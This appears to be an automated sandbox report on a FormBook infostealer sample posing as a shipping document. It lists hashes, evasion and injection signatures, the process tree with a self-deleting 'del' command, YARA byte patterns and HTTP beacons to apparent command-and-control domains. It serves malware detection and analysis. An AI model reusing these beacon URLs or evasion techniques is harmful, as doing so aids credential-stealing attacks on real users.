Loading ...

Play interactive tourEdit tour

Analysis Report CI_PL #WS190903_20201016_XLs.exe

Overview

General Information

Sample Name:CI_PL #WS190903_20201016_XLs.exe
Analysis ID:299346
MD5:d2041309d6ef5c0742820fc656d9b24c
SHA1:47050374dabe4e3c3a6b260ee7a515b2c9139c50
SHA256:d085d4d4370b02036dfe9de7c9061d88a8a5cd12cbced6dbdca9ba217112375c
Tags:exeFormbook

Most interesting Screenshot:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
System process connects to network (likely due to code injection or exploit)
Yara detected AntiVM_3
Yara detected FormBook
.NET source code contains potential unpacker
Injects a PE file into a foreign processes
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Modifies the prolog of user mode functions (user mode inline hooks)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect virtualization through RDTSC time measurements
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Startup

  • System is w10x64
  • CI_PL #WS190903_20201016_XLs.exe (PID: 7032 cmdline: 'C:\Users\user\Desktop\CI_PL #WS190903_20201016_XLs.exe' MD5: D2041309D6EF5C0742820FC656D9B24C)
    • CI_PL #WS190903_20201016_XLs.exe (PID: 6008 cmdline: {path} MD5: D2041309D6EF5C0742820FC656D9B24C)
      • explorer.exe (PID: 3424 cmdline: MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • cmmon32.exe (PID: 6684 cmdline: C:\Windows\SysWOW64\cmmon32.exe MD5: 2879B30A164B9F7671B5E6B2E9F8DFDA)
          • cmd.exe (PID: 7020 cmdline: /c del 'C:\Users\user\Desktop\CI_PL #WS190903_20201016_XLs.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 6796 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000005.00000002.911663684.0000000004BC0000.00000004.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    00000005.00000002.911663684.0000000004BC0000.00000004.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
    • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x9b62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x15685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x15171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x15787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x158ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0xa57a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x143ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xb273:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x1b327:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1c32a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    00000005.00000002.911663684.0000000004BC0000.00000004.00000001.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
    • 0x18409:$sqlite3step: 68 34 1C 7B E1
    • 0x1851c:$sqlite3step: 68 34 1C 7B E1
    • 0x18438:$sqlite3text: 68 38 2A 90 C5
    • 0x1855d:$sqlite3text: 68 38 2A 90 C5
    • 0x1844b:$sqlite3blob: 68 53 D8 7F 8C
    • 0x18573:$sqlite3blob: 68 53 D8 7F 8C
    00000005.00000002.911632100.0000000004B90000.00000040.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
      00000005.00000002.911632100.0000000004B90000.00000040.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
      • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x9b62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x15685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x15171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x15787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x158ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0xa57a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x143ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0xb273:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x1b327:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x1c32a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
      Click to see the 17 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      2.2.CI_PL #WS190903_20201016_XLs.exe.400000.0.raw.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
        2.2.CI_PL #WS190903_20201016_XLs.exe.400000.0.raw.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
        • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x9b62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x15685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x15171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x15787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x158ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0xa57a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x143ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0xb273:$sequence_7: 66 89 0C 02 5B 8B E5 5D
        • 0x1b327:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x1c32a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
        2.2.CI_PL #WS190903_20201016_XLs.exe.400000.0.raw.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
        • 0x18409:$sqlite3step: 68 34 1C 7B E1
        • 0x1851c:$sqlite3step: 68 34 1C 7B E1
        • 0x18438:$sqlite3text: 68 38 2A 90 C5
        • 0x1855d:$sqlite3text: 68 38 2A 90 C5
        • 0x1844b:$sqlite3blob: 68 53 D8 7F 8C
        • 0x18573:$sqlite3blob: 68 53 D8 7F 8C
        2.2.CI_PL #WS190903_20201016_XLs.exe.400000.0.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
          2.2.CI_PL #WS190903_20201016_XLs.exe.400000.0.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
          • 0x8ae8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x8d62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x14885:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x14371:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x14987:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x14aff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0x977a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x135ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0xa473:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x1a527:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x1b52a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
          Click to see the 1 entries

          Sigma Overview

          No Sigma rule has matched

          Signature Overview

          Click to jump to signature section

          Show All Signature Results

          AV Detection:

          barindex
          Multi AV Scanner detection for submitted fileShow sources
          Source: CI_PL #WS190903_20201016_XLs.exeVirustotal: Detection: 31%Perma Link
          Source: CI_PL #WS190903_20201016_XLs.exeReversingLabs: Detection: 20%
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000005.00000002.911663684.0000000004BC0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.911632100.0000000004B90000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.695420976.00000000013C0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.910775830.0000000000E40000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.693748747.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.695379204.0000000001390000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.657434154.0000000003521000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 2.2.CI_PL #WS190903_20201016_XLs.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.CI_PL #WS190903_20201016_XLs.exe.400000.0.unpack, type: UNPACKEDPE
          Machine Learning detection for sampleShow sources
          Source: CI_PL #WS190903_20201016_XLs.exeJoe Sandbox ML: detected
          Source: 2.2.CI_PL #WS190903_20201016_XLs.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: global trafficHTTP traffic detected: GET /sdk/?LnH4=8pp8IDzH80h&-ZWX1N2=myg/CAvWrPYdGYT5wN73cqOckDK6ZKz53/JvHozq4ZRCiAkAkRh0aYFAJGqSMOAqaNFA HTTP/1.1Host: www.shadent.storeConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /sdk/?-ZWX1N2=PZBhkyCRsI7z3E3t6IMGOfWYQMWca0Lqu1pX8CEJNV9yquxtIMxAzgOdmelb0pkJs94k&LnH4=8pp8IDzH80h HTTP/1.1Host: www.hazyblurcreative.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: Joe Sandbox ViewASN Name: BIZLAND-SDUS BIZLAND-SDUS
          Source: Joe Sandbox ViewASN Name: POWERLINE-AS-APPOWERLINEDATACENTERHK POWERLINE-AS-APPOWERLINEDATACENTERHK
          Source: global trafficHTTP traffic detected: GET /sdk/?LnH4=8pp8IDzH80h&-ZWX1N2=myg/CAvWrPYdGYT5wN73cqOckDK6ZKz53/JvHozq4ZRCiAkAkRh0aYFAJGqSMOAqaNFA HTTP/1.1Host: www.shadent.storeConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /sdk/?-ZWX1N2=PZBhkyCRsI7z3E3t6IMGOfWYQMWca0Lqu1pX8CEJNV9yquxtIMxAzgOdmelb0pkJs94k&LnH4=8pp8IDzH80h HTTP/1.1Host: www.hazyblurcreative.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: unknownDNS traffic detected: queries for: www.shadent.store
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 16 Oct 2020 14:43:55 GMTContent-Type: text/htmlContent-Length: 867Connection: closeServer: Apache/2Last-Modified: Fri, 10 Jan 2020 16:05:10 GMTAccept-Ranges: bytesAccept-Ranges: bytesAge: 0Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 0d 0a 20 20 20 20 3c 68 65 61 64 3e 0d 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 45 72 72 6f 72 20 2d 20 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 23 61 64 5f 66 72 61 6d 65 7b 20 68 65 69 67 68 74 3a 38 30 30 70 78 3b 20 77 69 64 74 68 3a 31 30 30 25 3b 20 7d 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 64 79 7b 20 6d 61 72 67 69 6e 3a 30 3b 20 62 6f 72 64 65 72 3a 20 30 3b 20 70 61 64 64 69 6e 67 3a 20 30 3b 20 7d 0d 0a 20 20 20 20 20 20 20 20 3c 2f 73 74 79 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 2f 61 6a 61 78 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6a 71 75 65 72 79 2f 31 2e 31 30 2e 32 2f 6a 71 75 65 72 79 2e 6d 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 20 20 20 20 20 20 20 20 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 6c 61 6e 67 75 61 67 65 3d 22 4a 61 76 61 53 63 72 69 70 74 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 76 61 72 20 75 72 6c 20 3d 20 27 68 74 74 70 3a 2f 2f 77 77 77 2e 73 65 61 72 63 68 76 69 74 79 2e 63 6f 6d 2f 3f 64 6e 3d 27 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 2b 20 64 6f 63 75 6d 65 6e 74 2e 64 6f 6d 61 69 6e 20 2b 20 27 26 70 69 64 3d 39 50 4f 4c 36 46 32 48 34 27 3b 0d 0a 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 24 28 64 6f 63 75 6d 65 6e 74 29 2e 72 65 61 64 79 28 66 75 6e 63 74 69 6f 6e 28 29 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 24 28 27 23 61 64 5f 66 72 61 6d 65 27 29 2e 61 74 74 72 28 27 73 72 63 27 2c 20 75 72 6c 29 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 29 3b 0d 0a 20 20 20 20 20 20 20 20 3c 2f 73 63 72 69 70 74 3e 0d 0a 20 20 20 20 3c 2f 68 65 61 64 3e 0d 0a 20 20 20 20 3c 62 6f 64 79 3e 0d 0a 20 20 20 20 20 20 20 20 3c 69 66 72 61 6d 65 20 69 64 3d 22 61 64 5f 66 72 61 6d 65 22 20 73 72 63 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 73 65 61 72 63 68 76 69 74 79 2e 63 6f 6d 2f 22 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 0d 0a 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 21 2d 2d 20 62 72 6f 77 73 65 72 20 64 6f 65 73 20 6e 6f 74 20 73 75 70 70 6f 72 74 20 69 66 72 61 6d 65 27 73 20 2d 2d 3e 0d 0a 0d 0a 20 20 20 20 20 20 20 20 3c 2f 69 66 72 61 6d 65 3e 0d 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0d 0a 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE HTML><html> <head> <title>404 Error - Page Not Found</title> <style> #ad_frame{ hei
          Source: explorer.exe, 00000003.00000000.676870007.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://fontfabrik.com
          Source: explorer.exe, 00000003.00000002.912144514.0000000002B50000.00000002.00000001.sdmpString found in binary or memory: http://www.%s.comPA
          Source: explorer.exe, 00000003.00000000.676870007.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
          Source: explorer.exe, 00000003.00000000.676870007.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.carterandcone.coml
          Source: explorer.exe, 00000003.00000000.676870007.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com
          Source: explorer.exe, 00000003.00000000.676870007.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers
          Source: explorer.exe, 00000003.00000000.676870007.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
          Source: explorer.exe, 00000003.00000000.676870007.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
          Source: explorer.exe, 00000003.00000000.676870007.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
          Source: explorer.exe, 00000003.00000000.676870007.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
          Source: explorer.exe, 00000003.00000000.676870007.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
          Source: explorer.exe, 00000003.00000000.676870007.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
          Source: explorer.exe, 00000003.00000000.676870007.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.fonts.com
          Source: explorer.exe, 00000003.00000000.676870007.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn
          Source: explorer.exe, 00000003.00000000.676870007.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
          Source: explorer.exe, 00000003.00000000.676870007.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
          Source: explorer.exe, 00000003.00000000.676870007.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
          Source: explorer.exe, 00000003.00000000.676870007.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
          Source: explorer.exe, 00000003.00000000.676870007.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.goodfont.co.kr
          Source: explorer.exe, 00000003.00000000.676870007.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
          Source: explorer.exe, 00000003.00000000.676870007.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.sajatypeworks.com
          Source: explorer.exe, 00000003.00000000.676870007.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.sakkal.com
          Source: explorer.exe, 00000003.00000000.676870007.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.sandoll.co.kr
          Source: cmmon32.exe, 00000005.00000002.912619083.000000000578F000.00000004.00000001.sdmpString found in binary or memory: http://www.searchvity.com/
          Source: cmmon32.exe, 00000005.00000002.912619083.000000000578F000.00000004.00000001.sdmpString found in binary or memory: http://www.searchvity.com/?dn=
          Source: explorer.exe, 00000003.00000000.676870007.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.tiro.com
          Source: explorer.exe, 00000003.00000000.676870007.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.typography.netD
          Source: explorer.exe, 00000003.00000000.676870007.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.urwpp.deDPlease
          Source: explorer.exe, 00000003.00000000.676870007.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.zhongyicts.com.cn

          E-Banking Fraud:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000005.00000002.911663684.0000000004BC0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.911632100.0000000004B90000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.695420976.00000000013C0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.910775830.0000000000E40000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.693748747.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.695379204.0000000001390000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.657434154.0000000003521000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 2.2.CI_PL #WS190903_20201016_XLs.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.CI_PL #WS190903_20201016_XLs.exe.400000.0.unpack, type: UNPACKEDPE

          System Summary:

          barindex
          Malicious sample detected (through community Yara rule)Show sources
          Source: 00000005.00000002.911663684.0000000004BC0000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000002.911663684.0000000004BC0000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000005.00000002.911632100.0000000004B90000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000002.911632100.0000000004B90000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000002.00000002.695420976.00000000013C0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000002.00000002.695420976.00000000013C0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000005.00000002.910775830.0000000000E40000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000002.910775830.0000000000E40000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000002.00000002.693748747.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000002.00000002.693748747.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000002.00000002.695379204.0000000001390000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000002.00000002.695379204.0000000001390000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000000.00000002.657434154.0000000003521000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000000.00000002.657434154.0000000003521000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 2.2.CI_PL #WS190903_20201016_XLs.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 2.2.CI_PL #WS190903_20201016_XLs.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 2.2.CI_PL #WS190903_20201016_XLs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 2.2.CI_PL #WS190903_20201016_XLs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: C:\Users\user\Desktop\CI_PL #WS190903_20201016_XLs.exeCode function: 2_2_00419D60 NtCreateFile,2_2_00419D60
          Source: C:\Users\user\Desktop\CI_PL #WS190903_20201016_XLs.exeCode function: 2_2_00419E10 NtReadFile,2_2_00419E10
          Source: C:\Users\user\Desktop\CI_PL #WS190903_20201016_XLs.exeCode function: 2_2_00419E90 NtClose,2_2_00419E90
          Source: C:\Users\user\Desktop\CI_PL #WS190903_20201016_XLs.exeCode function: 2_2_00419F40 NtAllocateVirtualMemory,2_2_00419F40
          Source: C:\Users\user\Desktop\CI_PL #WS190903_20201016_XLs.exeCode function: 2_2_00419D5A NtCreateFile,2_2_00419D5A
          Source: C:\Users\user\Desktop\CI_PL #WS190903_20201016_XLs.exeCode function: 2_2_00419DB2 NtReadFile,2_2_00419DB2
          Source: C:\Users\user\Desktop\CI_PL #WS190903_20201016_XLs.exeCode function: 2_2_00419E0A NtReadFile,2_2_00419E0A
          Source: C:\Users\user\Desktop\CI_PL #WS190903_20201016_XLs.exeCode function: 2_2_00419E8E NtClose,2_2_00419E8E
          Source: C:\Users\user\Desktop\CI_PL #WS190903_20201016_XLs.exeCode function: 2_2_00419F3B NtAllocateVirtualMemory,2_2_00419F3B
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_04D395D0 NtClose,LdrInitializeThunk,5_2_04D395D0
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_04D39540 NtReadFile,LdrInitializeThunk,5_2_04D39540
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_04D396D0 NtCreateKey,LdrInitializeThunk,5_2_04D396D0
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_04D396E0 NtFreeVirtualMemory,LdrInitializeThunk,5_2_04D396E0
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_04D39650 NtQueryValueKey,LdrInitializeThunk,5_2_04D39650
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_04D39660 NtAllocateVirtualMemory,LdrInitializeThunk,5_2_04D39660
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_04D39FE0 NtCreateMutant,LdrInitializeThunk,5_2_04D39FE0
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_04D39780 NtMapViewOfSection,LdrInitializeThunk,5_2_04D39780
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_04D39710 NtQueryInformationToken,LdrInitializeThunk,5_2_04D39710
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_04D39840 NtDelayExecution,LdrInitializeThunk,5_2_04D39840
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_04D39860 NtQuerySystemInformation,LdrInitializeThunk,5_2_04D39860
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_04D399A0 NtCreateSection,LdrInitializeThunk,5_2_04D399A0
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_04D39910 NtAdjustPrivilegesToken,LdrInitializeThunk,5_2_04D39910
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_04D39A50 NtCreateFile,LdrInitializeThunk,5_2_04D39A50
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_04D395F0 NtQueryInformationFile,5_2_04D395F0
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_04D39560 NtWriteFile,5_2_04D39560
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_04D3AD30 NtSetContextThread,5_2_04D3AD30
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_04D39520 NtWaitForSingleObject,5_2_04D39520
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_04D39670 NtQueryInformationProcess,5_2_04D39670
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_04D39610 NtEnumerateValueKey,5_2_04D39610
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_04D397A0 NtUnmapViewOfSection,5_2_04D397A0
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_04D3A770 NtOpenThread,5_2_04D3A770
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_04D39770 NtSetInformationFile,5_2_04D39770
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_04D39760 NtOpenProcess,5_2_04D39760
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_04D3A710 NtOpenProcessToken,5_2_04D3A710
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_04D39730 NtQueryVirtualMemory,5_2_04D39730
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_04D398F0 NtReadVirtualMemory,5_2_04D398F0
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_04D398A0 NtWriteVirtualMemory,5_2_04D398A0
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_04D3B040 NtSuspendThread,5_2_04D3B040
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_04D39820 NtEnumerateKey,5_2_04D39820
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_04D399D0 NtCreateProcessEx,5_2_04D399D0
